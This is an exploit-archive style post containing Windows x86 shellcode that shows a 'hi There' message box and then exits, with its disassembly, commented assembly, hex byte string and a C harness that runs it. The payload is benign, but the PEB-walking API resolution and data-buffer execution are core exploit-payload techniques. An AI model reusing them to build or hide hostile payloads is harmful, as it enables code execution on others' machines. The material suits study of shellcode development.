Windows x86 - MessageBoxA Shellcode (242 bytes)



EKU-ID: 5786 CVE: OSVDB-ID:
Author: Roziul Hasan Khan Shifat Published: 2016-08-17 Verified: Verified



/*
    # Title : Windows x86 MessageBoxA shellcode
    # Author : Roziul Hasan Khan Shifat
    # Date : 14-08-2016
    # Tested On : Windows 7 starter x86
*/
 
 
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   31 db                   xor    %ebx,%ebx
  14:   8b 59 3c                mov    0x3c(%ecx),%ebx
  17:   01 cb                   add    %ecx,%ebx
  19:   8b 5b 78                mov    0x78(%ebx),%ebx
  1c:   01 cb                   add    %ecx,%ebx
  1e:   8b 73 20                mov    0x20(%ebx),%esi
  21:   01 ce                   add    %ecx,%esi
  23:   31 d2                   xor    %edx,%edx
 
00000025 <g>:
  25:   42                      inc    %edx
  26:   ad                      lods   %ds:(%esi),%eax
  27:   01 c8                   add    %ecx,%eax
  29:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2f:   75 f4                   jne    25 <g>
  31:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  38:   75 eb                   jne    25 <g>
  3a:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  41:   75 e2                   jne    25 <g>
  43:   8b 73 1c                mov    0x1c(%ebx),%esi
  46:   01 ce                   add    %ecx,%esi
  48:   8b 14 96                mov    (%esi,%edx,4),%edx
  4b:   01 ca                   add    %ecx,%edx
  4d:   89 d6                   mov    %edx,%esi
  4f:   89 cf                   mov    %ecx,%edi
  51:   31 db                   xor    %ebx,%ebx
  53:   53                      push   %ebx
  54:   68 61 72 79 41          push   $0x41797261
  59:   68 4c 69 62 72          push   $0x7262694c
  5e:   68 4c 6f 61 64          push   $0x64616f4c
  63:   54                      push   %esp
  64:   51                      push   %ecx
  65:   ff d2                   call   *%edx
  67:   83 c4 10                add    $0x10,%esp
  6a:   31 c9                   xor    %ecx,%ecx
  6c:   68 6c 6c 42 42          push   $0x42426c6c
  71:   88 4c 24 02             mov    %cl,0x2(%esp)
  75:   68 33 32 2e 64          push   $0x642e3233
  7a:   68 75 73 65 72          push   $0x72657375
  7f:   54                      push   %esp
  80:   ff d0                   call   *%eax
  82:   83 c4 0c                add    $0xc,%esp
  85:   31 c9                   xor    %ecx,%ecx
  87:   68 6f 78 41 42          push   $0x4241786f
  8c:   88 4c 24 03             mov    %cl,0x3(%esp)
  90:   68 61 67 65 42          push   $0x42656761
  95:   68 4d 65 73 73          push   $0x7373654d
  9a:   54                      push   %esp
  9b:   50                      push   %eax
  9c:   ff d6                   call   *%esi
  9e:   83 c4 0c                add    $0xc,%esp
  a1:   31 d2                   xor    %edx,%edx
  a3:   31 c9                   xor    %ecx,%ecx
  a5:   52                      push   %edx
  a6:   68 73 67 21 21          push   $0x21216773
  ab:   68 6c 65 20 6d          push   $0x6d20656c
  b0:   68 53 61 6d 70          push   $0x706d6153
  b5:   8d 14 24                lea    (%esp),%edx
  b8:   51                      push   %ecx
  b9:   68 68 65 72 65          push   $0x65726568
  be:   68 68 69 20 54          push   $0x54206968
  c3:   8d 0c 24                lea    (%esp),%ecx
  c6:   31 db                   xor    %ebx,%ebx
  c8:   43                      inc    %ebx
  c9:   53                      push   %ebx
  ca:   52                      push   %edx
  cb:   51                      push   %ecx
  cc:   31 db                   xor    %ebx,%ebx
  ce:   53                      push   %ebx
  cf:   ff d0                   call   *%eax
  d1:   31 c9                   xor    %ecx,%ecx
  d3:   68 65 73 73 41          push   $0x41737365
  d8:   88 4c 24 03             mov    %cl,0x3(%esp)
  dc:   68 50 72 6f 63          push   $0x636f7250
  e1:   68 45 78 69 74          push   $0x74697845
  e6:   8d 0c 24                lea    (%esp),%ecx
  e9:   51                      push   %ecx
  ea:   57                      push   %edi
  eb:   ff d6                   call   *%esi
  ed:   31 c9                   xor    %ecx,%ecx
  ef:   51                      push   %ecx
  f0:   ff d0                   call   *%eax
*/
 
 
/*
section .text
    global _start
_start:
 
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->Ldr.InMemoryOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32 base address
 
 
xor ebx,ebx
mov ebx,[ecx+0x3c] ;DOS->e_lfanew
add ebx,ecx
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
 
;--------------------------------------------------
 
 
xor edx,edx
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g
 
 
;-----------------------------------------------------
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
;---------------------------------
 
 
mov edx,[esi+edx*4] ;edx = name-table index (+1, from the inc before lodsd) used directly as the function-table index
add edx,ecx ;GetProcAddress() -- no AddressOfNameOrdinals lookup, so this depends on the export layout of the kernel32 build it was tested on
 
;------------------
mov esi,edx
mov edi,ecx
;--------------------
 
;finding address of LoadLibraryA()
xor ebx,ebx
push ebx
push 0x41797261
push 0x7262694c
push 0x64616f4c
 
 
push esp
push ecx
 
call edx
 
add esp,16
;---------------------------
xor ecx,ecx
 
;LoadLibraryA("user32.dll")
push 0x42426c6c
mov [esp+2],byte cl
push 0x642e3233
push 0x72657375
 
 
push esp
call eax
 
;-------------------------
 
;Finding address of MessageBoxA()
add esp,12
xor ecx,ecx
push 0x4241786f
mov [esp+3],byte cl
push 0x42656761
push 0x7373654d
 
push esp
push eax
 
call esi
 
;---------------------------------
add esp,12
 
;----------------
;MessageBoxA(NULL,"hi There","Sample msg!!",1) ; hWnd=0, lpText=ecx, lpCaption=edx, uType=1 (pushed right-to-left below)
 
xor edx,edx
xor ecx,ecx
 
 
push edx
push 0x21216773
push 0x6d20656c
push 0x706d6153
 
lea edx,[esp] ; "Sample msg!!"
 
push ecx
push 0x65726568
push 0x54206968
 
lea ecx,[esp] ; "hi There"
 
xor ebx,ebx
 
inc ebx
 
 
push ebx
push edx
push ecx
xor ebx,ebx
push ebx
 
call eax
 
 
;----------------------
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
 
 
lea ecx,[esp]
 
 
push ecx
push edi
 
call esi
 
;---------------
xor ecx,ecx
push ecx
call eax
*/
 
 
#include<stdio.h>
#include<string.h>
/*
 * Machine code of the _start routine shown in the disassembly above
 * (offsets 0x00-0xf1, 242 bytes), stored as a C string literal.
 * strlen() in main() only reports that full size as long as no byte of
 * the encoding is 0x00 (none appears here); a zero byte anywhere would
 * silently truncate the count.
 */
char shellcode[]=\

"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
 
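/*
 * Test harness: prints the byte length of `shellcode`, then transfers
 * control to it by casting the array to a function pointer.
 *
 *  - The original declared `main()` with an implicit int return type,
 *    which has been invalid since C99; it is `int main(void)` here and
 *    returns 0 explicitly.
 *  - `shellcode` is a global char array, i.e. it lives in the writable
 *    data segment. Where DEP/NX is enforced that page is not executable
 *    and the indirect call faults before the first byte runs; the author
 *    reports testing only on Windows 7 Starter x86.
 *  - Casting a data array to a function pointer is undefined behavior in
 *    standard C and only works on toolchains/platforms that tolerate it.
 *  - The payload ends by calling ExitProcess(0) (see the asm above), so
 *    control normally never returns to this function.
 */
int main(void)
{
    printf("shellcode length %ld\n", (long)strlen(shellcode));
    (*(int (*)(void))shellcode)();
    return 0;
}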